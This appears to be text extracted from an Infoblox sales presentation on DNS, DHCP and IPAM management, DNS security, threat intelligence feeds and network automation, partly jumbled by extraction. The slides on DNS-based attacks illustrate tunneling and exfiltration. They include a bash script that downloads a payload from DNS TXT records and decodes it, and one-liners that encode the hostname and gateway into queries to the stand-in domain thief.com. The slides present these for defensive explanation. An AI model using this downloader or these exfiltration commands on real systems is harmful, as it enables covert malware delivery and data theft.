NGDDI – The Context and Network Metadata

DNS Security and Partner Ecosystem

1 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Overview & Business Update

• Founded in 1999, IPO in 2012: NYSE BLOX Worldwide DDI

• Headquartered in Santa Clara, CA Market Share
with global operations in 25 countries
• Leader in technology for network
control
• Market leadership
̶ DDI Market Leader (Gartner)
̶ 50% DDI Market Share (IDC)
• 8,000+ customers
• 64,000+ systems shipped
• 38 patents, 25 pending
• Annual revenue $300M, 27% CAGR
• Infoblox acquired IID in 2016
̶ Leader in providing verified Machine Readable
Threat Intelligence (MRTI)

2 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Traditional Core Network Services (DNS, DHCP and IPAM)
Integrated DDI for physical and virtual
environments
Authoritative IPAM Advanced Infoblox
• Visibility Reporting DNS/DHCP
• Efficiency
• Control
Network Task Microsoft
Automation DNS/DHCP
DNS
• Secure
• Intelligent
• Extensible
Virtual Discovery IP network Discovery
DHCP
• Automation
• Insight
Network
IP Endpoints Switch/Routers

3 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Flexible Deployment Options with Microsoft

Designed to Match Unique Organization Requirements

Infoblox Authoritative IPAM (with Microsoft DHCP, DNS)

Labor and time • Non-disruptive overlay solution. Agentless, native Microsoft communication
savings with
Infoblox
• Automated, closed-loop workflows and task scheduling
IPAM:~ 70%! • Centralized management and troubleshooting via a single pane of glass

Infoblox DHCP (with Microsoft DNS)

• Improved service uptime with standards based HA and proven DHCP failover
• Improved security and visibility of all network devices with DHCP device fingerprinting
• Enhanced reporting with DHCP lease history (now with user name)

Infoblox DNS (with Microsoft Active Directory)

MSFT DNS
Refresh rate is • Secure DNS environment: detection, protection, and mitigation against malware and data exfiltration
15 min to 4hrs • Fully integrated with Active Directory
vs. few secs for
Infoblox

4 | © 2013
2018 Infoblox Inc. All Rights Reserved.
The Infoblox Advantage – Patented Grid Technology
Centralized Visibility & control of core
network services

All Centrally Managed

Your Public Your Private as ONE System
Cloud IaSS Cloud IaSS
Infoblox
Cloud
HQ Grid
ActiveTrust
Master (HA Grid Master
Threat Intel pair) Candidate
@Recovery Site

Grid Member
with DNS Firewall

Infoblox
Threat data feeds
Grid Member
Grid DNS / DHCP
for use in
Network ecosystem
Insight

Grid Member Grid Member Network and

Reporting & DNS / DHCP Branch office Security events
Analytics with context
Edge Network/
Remote Office
DHCP Microsoft DNS,
DHCP
Device Network infrastructure (Switches, Routers,
discovery Firewalls etc.)

5 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Infoblox Evolution
DDI with Authoritative IPAM

6 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 NGDDI  Microsoft Integration, AD User Identity Mapping

• Adds new Sync process for Identity mapping

̶ Extended “Add Microsoft Server” wizard with user mapping options
- Microsoft tab is now always displayed, non-identity mapping capabilities are
only shown with license
̶ Agentless (MS-RPC) interface to pull AD authentication logs
̶ Correlates IP & user information in AD authentication events
̶ Exchange servers can be included (allows mapping of mobile devices)

• Adds user information into IPAM,DNS, & DHCP tabs

• New “Network Users” view, and “User Login History” report
• Added user information into existing reports in Reporting
Member
̶ DHCP Lease History
̶ Top RPZ Hits
• New “Network Users” Dashboard Widget
7 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NGDDI  Localization and visibility,
Network Insight for Security

Detect breakdown in change management process:

Discovering networks not in IPAM shows lack of compliance to process

Check endpoint MAC addresses against authoritative record

NAC policy verification

Locate rogue and compromised endpoints and take remediation action

Network Increased Operational

Visibility Security Efficiencies

Discovery and visibility of Detection of rogue devices, Integrated discovery to IPAM

devices, interfaces, workflow to convert discovered
reduced configuration errors,
assets into managed objects
networks, IP addresses, & detection of unmanaged and set discovery parameters
endpoints and connectivity networks & assets on added hosts and networks

8 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NGDDI  Security and Analytics,
Reporting, Auditing and Forensic
Application
Uptime
Monitor the health and
status of the core services
supporting your business
critical applications and
predict future
Compliance
Quickly generate
compliance reports,
without impacting the
performance of grid
members.
9 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Security
Stop security breaches
before they occur and
detect and control APT’s
faster.
Capacity
Planning
Track, trend and predict
key capacity parameters
over time, to ensure
your core network
services match growth.
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
What IP? ONE SHOT
DHCP Service / Discovery
What has
When Appear? happened in the
Allocate / Discovery / Cloud
past?
Which MAC ? DHCP or Discovery
IP, User,
hostname, RPZ,
Device Type? DHCP Fingerprint lease…

DNS hostname? DNS + DDNS updates Ecosystem

Activity?
User Behind? AD user Identity Mapping
Tracking History?
Where is It? Network Insight / Cloud IPAM

Network Context? Risk, localization, attributes

ONE SHOT
Infoblox Analytics
Infected? Block? DNSFW / Insight + Ecosystem and Reporting
10 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox key Product Initiatives
Security
• Malware & Advanced Persistent Threats (APT)
• Infrastructure attacks (DDoS)
• DNS Tunneling and Data Exfiltration

Availability
• Intelligent traffic management for global services
• Services performance optimization
• Global and Local proximity delivery services

Cloud
• Ongoing evolution of the Data Center
• Private, Public, Hybrid

Automation
• Budget for IT headcount continues to decline
• Skilled staff more difficult to find and retain

11 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Infoblox Evolution
DDI with Secure DNS

12 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Malware Exploiting DNS
• Over 91% percent malware uses DNS
̶ To gain command and control
̶ To exfiltrate data
̶ To redirect traffic
• Despite adversaries’ reliance on DNS,
68% organizations do not monitor
recursive DNS
• Advanced attacks and data breaches
persist and impact all sizes and types of
organizations
• Average total cost of data breach ~$3.8M
USD
• The question isn’t if, but when you will be
attacked, and how effectively you can
respond

Source: Cisco 2016 Annual Security Report

13 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Hiding network Data via DNS Tunneling
• Uses DNS as a covert communication channel to
bypass firewalls
Internet
• Attacker tunnels other protocols like SSH, or web
within DNS
• Enables attackers to easily insert malware, pass INTERNET

stolen data or tunnel IP traffic without detection

ENTERPRISE
• A DNS tunnel can be used as a full remote-control
IP traffic
channel for a compromised internal host
Examples:
̶Iodine DNS
terminal server
̶OzymanDNS Encoded IP
Iodine in DNS queries
̶SplitBrain
̶DNS2TCP
Client-side
tunnel program

Slow DNS

14 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Data Exfiltration over DNS Queries
Malware Steals File Containing Sensitive Data
• Infected endpoint gets access to file
containing sensitive data
• It encrypts and converts info into NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
encoded format DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
• Text broken into chunks and sent via Company.foo.thief.com

DNS using hostname.subdomain or Syslog +12f(2354ayqv1asdf7s6ex.thief.com

TXT records Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
• Exfiltrated data reconstructed at the nkjFYVW$%&(YBH$JKGHkjh.thief.com
Rogue DNS
other end Server C & C
• Can use spoofed addresses to avoid
om
detection f.c
hie
x.t

Data is listed on Darknet

6e
7s

and sold for Bitcoin

df
as
v1
yq
4a
5

NameMarySmith.foo.thief.com
23
2f(

MRN100045429886.foo.thief.com
+1

DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
+12f(2354ayqv1asdf7s6ex
Company.foo.thief.com Xc786asdf89xcbv897sadfjlw
fityhkjDR65eUGYbjkUY6756
nkjFYVW$%&(YBH$JKGHkjh

Compromised
Endpoint

15 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Malware Infiltration over DNS - TXT

"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAO
CQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABA
AEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAA
wAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA" Command
and Control
Rogue DNS Server Quer
y for TX
T

Binary code is encoded and loaded into TXT

records

DDNS update
Query for TXT "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAO
CQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABA
AEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAA
wAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"

16 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infiltration and C&C behavior infection

Downloader Script 4 TXT records

#!/bin/bash
23212f62696e2f62617368206572726f723d5c273b3b20
error=';; connection timed out; no servers 636f6e6e656374696f6e2074696d6564206f75743b206e
could be reached'
6f207365727665727320636f756c642062652072656163
i=0
6865645c2720693d30206563686f205c275c273e206f75
echo ''> output.b64
747075742e6236
while :
do
34207768696c65203a20646f202020524553503d60646
RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2`
967202b73686f72742024692e243120545854207c2063
if [ "$RESP" = "$error" ]; 7574202d645c275c225c27202d6620326020202069662
then
05b205c2224524553505c22203d205c22246572726f72
echo "Timeout - done"
5c22205d3b202020
break
fi
7468656e20202020206563686f205c2254696d656f7574
echo -ne $RESP >> output.b64
202d20646f6e655c222020202020627265616b2020206
echo $RESP
6692020206563686f202d6e65202452455350203e3e20
i=$((i+1)) 6f75747075742e6236342020206563686f202452455350
done 202020693d2428
cat output.b64 | base64 -d > output
28692b31292920646f6e6520636174206f75747075742e
623634207c20626173653634202d64203e206f7574707
574

17 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Command and Control
Signaling and Control responses with DNS

hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com

PTR -> 1.2.3.4

IPv4 ipconfig getifaddr en0| xxd -p

Hostname
Gateway Query A-> 3137322e32302e31302e320a.thief.com

PTR -> 1.2.3.4

route -n get default|grep gateway|cut -d: -f 2|sed 's/^[ \t]*//;s/[ \t]*$//'|xxd -p

Query A-> 3137322e32302e31302e310a.thief.com

PTR -> 1.2.3.4

18 | © 2013
2018 Infoblox Inc. All Rights Reserved.
DNS is Coverage? YES with Infoblox

App Offerings
Salesforce.com
Office 365
Workday – HR
SAP

Firewall/NGFW
Your SIEM Solution
• Centralized logging and reporting
IPS/IDS

DNS communicates Web Proxy

via Port 53 and is
NOT protected by
Email/SPAM
these tools
 Secure DNS at the source
APT/Sandbox  Reporting
 Proactive block malware and
DNS understand who’s infected
 Prevent IP leaving your DC
Biz DHCP
IP/Data

19 | © 2013
2018 Infoblox Inc. All Rights Reserved.
The Motion of Malware Through Networks
Malware uses DNS at every stage
Infiltration Infection Exfiltration

Query malicious domains and Download Malware to the Transport the data offsite
report to C &C infected host

DNS Server Client Server

Unique
Infrastructure
positon
Network
20 | © 2013
2018 Infoblox Inc. All Rights Reserved.
DNSFW & Active Trust Threat Intelligence
• “Feeds” only block access
̶ Cause of the problem is
Phishing
Botnets still there!
SPAM
̶ Still require analysts to
IPs ActiveTrust identify Size, Scope,
Severity
URLs
̶ Still require them to find
and clean the device
• Local intelligence (context)
allows you to start
Infoblox Threat automating the analysis and
Intelligence
Feed
mitigation
NAC
Malwar
- Base
e ̶ It now becomes
- Malware DLP
- Ransomware WAF ”Actionable Intelligence”
• Device IP address NGFW
• Device MAC address IPS • Finally, there are many feeds
• Device type FW
FEEDs
Feed(s)
• Device host name
̶ Each specializes in
Infoblox DDI
• Device lease history something
• User Logged
Platform
• Device localization ̶ There is very little
• Device Metadata
User-defined
Other Vendor Feed
overlap
RPZ behaviors ̶ As customers’ security
capability matures, they
use more and more

22 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox TIDE – External Threat Feeds
Solution Overview
• Infoblox ActiveTrust receives
threat data from third-party
sources
• This third party data is then
managed from within Infoblox
TIDE.

Benefits
Infoblox 1. Collect and manage curated
TIDE threat intelligence in a single
platform
2. Maximize resources by giving
back time to the security
operations and threat
intelligence team

Support model: TBD

23 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Leveraging Threat Intel Across Entire
Security Infrastructure

Infoblox C&C IP List

Phishing &
SURBL Malware URLs Various
TIDE file
Marketplace Define Data Spambot IPs formats
Policy,
Governance & C&C & Malware
Custom TI Translation Host/Domain

• Threat intel automatically

aggregated from internal
Dossier
and external sources Investigate
• Flexible data distribution Threats
to NGFW, SIEM, etc.

RESULT: Single-source of TI management Faster triage Threat Prioritization

24 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Streaming DNS Threat Insight Analytics Works

Detects sophisticated data exfiltration techniques

that don’t have well-known signatures (zero day)

1. Looks at TXT records, A, AAAA records

2. Detects presence of data using lexical and Entropy

temporal analysis
3. Certain attributes add to a threat score, Size Lexical

others subtract from it Analysis

4. Final score classifies a request as Model
exfiltration or not
5. If exfiltration is found, automatically adds
Frequency N-Gram

destinations to special internal RPZ feed

6. Scales protection to other parts of the
network

25 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Infoblox ActiveTrust Cloud as a Service

Machine Readable
Threat Intelligence
ActiveTrust as a Service + Multi-pronged Threat Detection and
Threat Intelligence + Threat Insight as a Service
Prevention
• Aggregated & shared Threat Intelligence,
TIP designed for enterprises
ase
P Le • DNS Reputation
C
Download Threat Intelligence DH
gs, sight
st Lo
In • Behavioral Analytics, data exfiltration
Tru ork
c tive Netw
A

Data Collector VM
Internal Authoritative DNS + NAT + Firewall NAT + Firewall
ActiveTrust + Threat Intelligence End to End Protection
• On/off premise
• Roaming devices

On Premise Devices Roaming Devices • Remote/branch locations

Central Office / Data Center Devices with Mobile Client* with Mobile Client*

On Premise Off Premise

Unified policy, reporting and analytics

Single Unified Console for Management

26 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox as part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation

Context to Prioritize Remediation

Device Audit Trail and

Fingerprinting
DHCP • Device info, MAC, lease history

Application and
Business Context
IPAM • “Metadata” via Extended
Attributes: Owner, app, security
level, location, ticket number

• Context for accurate risk

assessment and event
prioritization

• Malicious activity inside the

security perimeter

• Includes BYOD and IoT devices

DNS
• Profile device & user activity

27 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced
DNS Protection include:
• Software ADP:
For organizations with lower capacity
requirements with a lower entry price
point.
• Infoblox Appliances:
Trinzic hardware and virtual
appliances consist of Trinzic TE-
1410/1420/ 815/825/1415 appliances
with software ADP subscription add-
on. Virtual appliances are supported
on VMware and KVM.
• Advanced DNS Protection Service:
The software plus Threat Adapt
technology provides ongoing
protection against existing and
evolving threats to the DNS server.
• Reporting and Analytics:
Deep visibility and rich network
context around attack patterns and
sources.

28 | © 2013
2018 Infoblox Inc. All Rights Reserved.
 Infoblox Network Automation - NetMRI

29 | © 2013
2018 Infoblox Inc. All Rights Reserved.
What is NetMRI?
Origin: Network Consulting Assessments...
1. Network Discovery and Inventory
̶ Network friendly
̶ Network constructs, not just devices
(routes, VLANs, VRRP Pairs, etc.)
̶ Multi-layer topology
̶ Auto correlation
2. Network Configuration Analysis
̶ Proactive identification of hidden problems
with no fault or perf symptoms
̶ Port duplex mismatch, VLAN member
riorities, VRRP not recognizing peer, etc.
3. Security Policy Enforcement
̶ Bundled content
̶ Easy customization + unique capabilities
̶ Auto analysis, auditing, and reporting
4. Change Automation & Config Mgmt
̶ Change Detection, Audit, Config B/U, etc.
̶ Advanced / unique change automation

30
30 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NetMRI Deployment Overview = Appliance
NetMRI
Real-time & Historical
Analysis

• Network discovery
• Built-in analysis
• Check against best practices Collected Via:
• Check against security policies SNMP
• Detect issues CLI/configuration
• Monitor and manage change Syslog
• Automate change Fingerprinting
• Switch port management

31 | © 2013
2018 Infoblox Inc. All Rights Reserved.
3
 Pre-SALES:
David Alfonso
david.alfonso@arrow.com
+34 660 252 134

SALES:
Patricia Cobo
patricia.cobo@arrow.com
+34 690 992 921

Pre-SALES:
Angel Aviles
angel.aviles@arrow.com

32 | © 2013
2018 Infoblox Inc. All Rights Reserved.